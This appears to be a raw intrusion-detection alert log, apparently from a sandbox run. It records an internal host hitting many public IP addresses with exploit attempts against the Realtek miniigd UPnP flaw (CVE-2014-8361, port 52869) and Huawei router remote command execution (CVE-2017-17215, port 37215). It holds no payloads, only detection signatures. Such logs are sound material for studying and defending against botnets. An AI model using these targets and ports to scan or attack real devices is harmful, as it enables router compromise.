                                      07/20/24-23:01:45.648154TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24929052869192.168.2.23179.206.84.130
                                      07/20/24-23:01:59.704241TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615242052869192.168.2.23162.200.88.148
                                      07/20/24-23:01:55.903209TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614807252869192.168.2.23175.53.167.172
                                      07/20/24-23:01:43.185498TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5960452869192.168.2.2348.248.156.6
                                      07/20/24-23:01:25.522869TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613910652869192.168.2.23105.131.75.237
                                      07/20/24-23:01:43.020186TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614845452869192.168.2.2371.205.8.144
                                      07/20/24-23:01:56.809584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4880052869192.168.2.231.7.30.66
                                      07/20/24-23:01:42.790558TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23392652869192.168.2.2394.18.60.159
                                      07/20/24-23:01:42.616435TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25002652869192.168.2.2319.135.72.216
                                      07/20/24-23:01:45.947642TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5640252869192.168.2.23185.117.12.122
                                      07/20/24-23:01:41.686830TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24502852869192.168.2.2334.239.73.219
                                      07/20/24-23:01:41.193880TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5346252869192.168.2.23151.105.247.52
                                      07/20/24-23:01:02.462458TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5665252869192.168.2.23219.105.54.148
                                      07/20/24-23:01:34.053062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4425837215192.168.2.23197.91.197.8
                                      07/20/24-23:01:44.783923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3279252869192.168.2.23155.22.111.5
                                      07/20/24-23:01:55.166507TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4627052869192.168.2.2375.33.175.78
                                      07/20/24-23:01:03.819275TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616058652869192.168.2.2313.188.89.36
                                      07/20/24-23:01:44.631925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4236252869192.168.2.2332.163.145.253
                                      07/20/24-23:01:55.536863TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4947852869192.168.2.2396.112.20.112
                                      07/20/24-23:01:45.574617TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3965652869192.168.2.23152.70.166.60
                                      07/20/24-23:01:31.320338TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24007652869192.168.2.23105.131.75.237
                                      07/20/24-23:01:42.519318TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5179052869192.168.2.238.226.239.105
                                      07/20/24-23:01:42.357440TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615313852869192.168.2.23207.162.61.245
                                      07/20/24-23:01:11.635828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056637215192.168.2.2341.44.82.133
                                      07/20/24-23:01:31.330511TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4497652869192.168.2.23142.4.77.39
                                      07/20/24-23:01:27.650975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619237215192.168.2.2341.158.206.208
                                      07/20/24-23:01:07.018425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010037215192.168.2.23197.65.5.53
                                      07/20/24-23:02:01.201976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5842452869192.168.2.23129.210.122.194
                                      07/20/24-23:01:59.593868TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614256452869192.168.2.23118.42.225.58
                                      07/20/24-23:01:46.725077TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614084852869192.168.2.23200.222.88.102
                                      07/20/24-23:00:59.148145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344037215192.168.2.23157.5.83.65
                                      07/20/24-23:01:00.639093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4611637215192.168.2.23157.170.103.64
                                      07/20/24-23:01:42.486622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4370452869192.168.2.2347.30.224.199
                                      07/20/24-23:01:43.047922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3529252869192.168.2.23219.196.66.69
                                      07/20/24-23:01:42.422050TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26096052869192.168.2.23162.207.42.25
                                      07/20/24-23:01:59.799089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5312252869192.168.2.23105.66.231.198
                                      07/20/24-23:01:24.876750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038037215192.168.2.23197.235.121.63
                                      07/20/24-23:01:04.950811TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613340052869192.168.2.23111.160.194.136
                                      07/20/24-23:01:42.758954TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26055652869192.168.2.23187.33.239.16
                                      07/20/24-23:01:53.494330TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5149252869192.168.2.2369.58.59.239
                                      07/20/24-23:01:02.726681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5401252869192.168.2.23218.185.172.90
                                      07/20/24-23:01:08.684499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3456652869192.168.2.23123.31.253.14
                                      07/20/24-23:01:24.889163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471837215192.168.2.23157.178.234.164
                                      07/20/24-23:00:59.163619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056037215192.168.2.23157.213.175.190
                                      07/20/24-23:01:31.328855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24495052869192.168.2.2336.230.221.168
                                      07/20/24-23:01:51.968362TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25300252869192.168.2.239.210.224.238
                                      07/20/24-23:01:31.314906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25743052869192.168.2.2385.173.195.222
                                      07/20/24-23:01:50.246033TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615462252869192.168.2.2392.182.23.52
                                      07/20/24-23:01:04.094795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028037215192.168.2.23197.178.38.115
                                      07/20/24-23:01:20.157620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5952237215192.168.2.23157.203.129.55
                                      07/20/24-23:01:24.910426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407237215192.168.2.2341.84.150.41
                                      07/20/24-23:01:24.915904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928437215192.168.2.23133.187.212.183
                                      07/20/24-23:01:40.320408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085037215192.168.2.23157.7.143.99
                                      07/20/24-23:01:40.331150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4466437215192.168.2.23197.218.83.13
                                      07/20/24-23:01:46.359091TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615081452869192.168.2.23206.50.68.232
                                      07/20/24-23:01:27.653586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3693037215192.168.2.23197.200.193.163
                                      07/20/24-23:01:43.197088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3337252869192.168.2.23135.97.77.234
                                      07/20/24-23:01:57.500950TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23428052869192.168.2.23145.1.23.220
                                      07/20/24-23:01:58.291705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24330252869192.168.2.23116.106.3.51
                                      07/20/24-23:01:24.916250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126437215192.168.2.2382.205.201.63
                                      07/20/24-23:01:01.628217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3898252869192.168.2.23216.174.225.184
                                      07/20/24-23:01:14.105908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388437215192.168.2.23157.223.215.224
                                      07/20/24-23:01:42.945748TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615413852869192.168.2.23180.13.32.83
                                      07/20/24-23:00:57.221273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862837215192.168.2.23157.240.255.134
                                      07/20/24-23:01:08.631492TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24090052869192.168.2.23216.151.5.50
                                      07/20/24-23:01:08.563416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24669852869192.168.2.2336.193.87.124
                                      07/20/24-23:02:05.835826TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614820652869192.168.2.23141.221.231.245
                                      07/20/24-23:01:41.341391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3784052869192.168.2.2335.242.111.156
                                      07/20/24-23:01:27.650870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081837215192.168.2.23197.157.38.150
                                      07/20/24-23:01:40.301143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301837215192.168.2.23157.199.208.242
                                      07/20/24-23:01:42.508021TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3413252869192.168.2.23100.224.33.210
                                      07/20/24-23:01:45.196200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3389452869192.168.2.2374.130.124.117
                                      07/20/24-23:01:21.915268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773037215192.168.2.23197.57.71.77
                                      07/20/24-23:01:02.287452TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5115052869192.168.2.23172.32.160.159
                                      07/20/24-23:01:42.592254TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25997252869192.168.2.2349.57.98.237
                                      07/20/24-23:02:08.128674TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615132252869192.168.2.23136.224.18.44
                                      07/20/24-23:01:02.093903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4173837215192.168.2.2341.105.49.77
                                      07/20/24-23:01:31.312614TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24375452869192.168.2.2375.178.59.59
                                      07/20/24-23:01:32.076593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890637215192.168.2.23157.204.232.233
                                      07/20/24-23:01:44.338159TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614960252869192.168.2.2390.112.61.164
                                      07/20/24-23:01:44.926055TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5410852869192.168.2.23159.4.8.31
                                      07/20/24-23:01:44.466755TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6006652869192.168.2.23153.51.4.30
                                      07/20/24-23:02:01.201976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615842452869192.168.2.23129.210.122.194
                                      07/20/24-23:01:00.641498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5341037215192.168.2.2319.199.208.241
                                      07/20/24-23:01:08.640831TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25555452869192.168.2.23187.26.13.206
                                      07/20/24-23:01:04.989160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3479252869192.168.2.2360.208.170.61
                                      07/20/24-23:01:53.238230TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613544052869192.168.2.23170.211.30.37
                                      07/20/24-23:00:57.221583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445837215192.168.2.23157.170.128.9
                                      07/20/24-23:01:41.947663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4029052869192.168.2.23202.203.199.212
                                      07/20/24-23:01:34.044417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246237215192.168.2.2341.199.123.9
                                      07/20/24-23:01:44.839991TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4115452869192.168.2.23182.158.136.187
                                      07/20/24-23:01:48.498136TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615322452869192.168.2.23171.236.184.127
                                      07/20/24-23:01:41.328264TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614447252869192.168.2.2334.239.73.219
                                      07/20/24-23:01:06.991143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237837215192.168.2.23157.239.230.243
                                      07/20/24-23:01:24.944299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837037215192.168.2.23157.128.42.189
                                      07/20/24-23:01:54.642694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613682252869192.168.2.23165.191.241.94
                                      07/20/24-23:01:14.308979TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5226852869192.168.2.2320.24.147.17
                                      07/20/24-23:01:49.615311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4802252869192.168.2.23185.10.206.42
                                      07/20/24-23:01:08.639622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25506252869192.168.2.2382.99.109.50
                                      07/20/24-23:01:24.071868TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615794252869192.168.2.2359.198.200.174
                                      07/20/24-23:01:57.213768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4311652869192.168.2.23112.142.124.162
                                      07/20/24-23:01:49.254553TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4872652869192.168.2.2332.103.164.103
                                      07/20/24-23:01:42.603963TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5559052869192.168.2.2399.98.54.155
                                      07/20/24-23:01:42.399678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3844452869192.168.2.23115.35.192.158
                                      07/20/24-23:01:43.555540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3499452869192.168.2.2339.189.20.84
                                      07/20/24-23:01:44.953142TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4673852869192.168.2.23220.31.50.128
                                      07/20/24-23:01:58.504284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3312652869192.168.2.23196.117.225.80
                                      07/20/24-23:01:42.530468TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4906652869192.168.2.23164.43.137.199
                                      07/20/24-23:01:42.602712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4389452869192.168.2.23126.224.156.29
                                      07/20/24-23:01:03.948226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4212652869192.168.2.23223.193.169.99
                                      07/20/24-23:01:49.228425TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614345452869192.168.2.23219.217.14.87
                                      07/20/24-23:01:57.886795TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5133852869192.168.2.23194.242.148.126
                                      07/20/24-23:01:43.571815TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24476452869192.168.2.23125.78.0.230
                                      07/20/24-23:01:08.597662TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23447252869192.168.2.2314.23.231.227
                                      07/20/24-23:01:42.880524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5913652869192.168.2.2385.78.48.17
                                      07/20/24-23:01:24.960642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460837215192.168.2.23197.66.163.45
                                      07/20/24-23:01:41.229799TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613600852869192.168.2.23108.137.226.148
                                      07/20/24-23:01:46.340763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5404252869192.168.2.23165.18.43.140
                                      07/20/24-23:01:57.321432TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614734252869192.168.2.2347.201.63.165
                                      07/20/24-23:01:44.559176TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615101652869192.168.2.23123.97.7.185
                                      07/20/24-23:01:11.820979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5055437215192.168.2.2341.138.109.222
                                      07/20/24-23:01:20.156820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689637215192.168.2.23197.42.191.226
                                      07/20/24-23:01:00.639093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4070837215192.168.2.23197.176.41.115
                                      07/20/24-23:01:46.444461TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5297052869192.168.2.23197.9.101.249
                                      07/20/24-23:02:06.935770TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613674852869192.168.2.2364.225.111.147
                                      07/20/24-23:00:59.178062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465437215192.168.2.23197.241.127.58
                                      07/20/24-23:01:01.164622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4364452869192.168.2.23199.61.238.254
                                      07/20/24-23:01:43.536328TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5512652869192.168.2.2394.120.34.76
                                      07/20/24-23:01:43.944379TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3958852869192.168.2.23176.130.206.241
                                      07/20/24-23:00:57.223887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133037215192.168.2.23197.148.93.189
                                      07/20/24-23:01:40.320408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888637215192.168.2.23143.182.102.65
                                      07/20/24-23:01:45.519802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3927852869192.168.2.23173.68.146.233
                                      07/20/24-23:01:40.294677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3390437215192.168.2.23197.252.182.107
                                      07/20/24-23:01:42.718842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3581652869192.168.2.23106.204.29.126
                                      07/20/24-23:01:44.837053TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614999452869192.168.2.2327.31.121.159
                                      07/20/24-23:01:01.752804TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3980052869192.168.2.23172.95.79.32
                                      07/20/24-23:01:07.054782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650037215192.168.2.23204.194.235.34
                                      07/20/24-23:01:44.036421TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4908852869192.168.2.23218.231.87.4
                                      07/20/24-23:01:02.055683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556237215192.168.2.23164.204.194.37
                                      07/20/24-23:01:03.096471TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614487052869192.168.2.23221.226.241.204
                                      07/20/24-23:01:20.131339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5747237215192.168.2.23197.74.155.53
                                      07/20/24-23:01:51.212550TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614096452869192.168.2.2388.239.244.206
                                      07/20/24-23:01:58.892811TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615341652869192.168.2.23105.169.76.44
                                      07/20/24-23:01:20.596402TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25119252869192.168.2.231.209.93.74
                                      07/20/24-23:01:20.149798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793837215192.168.2.23157.253.8.89
                                      07/20/24-23:01:44.559917TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23773452869192.168.2.2335.56.95.76
                                      07/20/24-23:01:04.426363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3498852869192.168.2.23172.97.184.195
                                      07/20/24-23:01:51.594415TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24410052869192.168.2.23115.65.225.50
                                      07/20/24-23:01:44.439012TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615012852869192.168.2.23112.170.166.3
                                      07/20/24-23:01:08.607816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4507452869192.168.2.23177.27.5.34
                                      07/20/24-23:01:42.322405TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615952052869192.168.2.2398.94.65.60
                                      07/20/24-23:01:24.904906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995637215192.168.2.23197.71.217.61
                                      07/20/24-23:01:08.563416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3787452869192.168.2.23126.16.187.60
                                      07/20/24-23:01:44.491060TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25639452869192.168.2.23194.44.142.130
                                      07/20/24-23:01:53.697003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4945052869192.168.2.2385.241.89.47
                                      07/20/24-23:01:51.304967TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613493852869192.168.2.23122.69.178.214
                                      07/20/24-23:01:02.059312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238037215192.168.2.23153.209.101.198
                                      07/20/24-23:01:04.039129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4548237215192.168.2.23157.237.121.217
                                      07/20/24-23:01:08.598416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4101452869192.168.2.2325.222.87.118
                                      07/20/24-23:02:41.032515TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614461852869192.168.2.23143.147.42.76
                                      07/20/24-23:01:20.169339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943437215192.168.2.23197.20.237.144
                                      07/20/24-23:01:34.060991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4380037215192.168.2.2341.222.79.156
                                      07/20/24-23:01:52.701293TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5337652869192.168.2.2361.27.196.68
                                      07/20/24-23:02:26.791106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4931452869192.168.2.23176.235.230.116
                                      07/20/24-23:00:57.222164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154837215192.168.2.23172.101.164.72
                                      07/20/24-23:01:41.249014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613762252869192.168.2.23136.37.204.244
                                      07/20/24-23:02:20.472956TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613784452869192.168.2.2388.79.134.29
                                      07/20/24-23:01:42.042815TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613692052869192.168.2.23177.147.32.222
                                      07/20/24-23:00:59.172943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412637215192.168.2.23157.77.213.179
                                      07/20/24-23:01:52.904266TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3581852869192.168.2.2319.191.190.54
                                      07/20/24-23:01:43.170156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4023252869192.168.2.23126.252.220.138
                                      07/20/24-23:01:46.181357TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3832652869192.168.2.23195.86.64.66
                                      07/20/24-23:02:09.095115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3568652869192.168.2.2377.112.214.83
                                      07/20/24-23:01:02.066908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930637215192.168.2.2341.211.122.175
                                      07/20/24-23:01:53.937783TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23615052869192.168.2.23188.131.252.163
                                      07/20/24-23:01:02.066908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3733837215192.168.2.2341.126.153.94
                                      07/20/24-23:01:04.050503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692037215192.168.2.2341.120.201.209
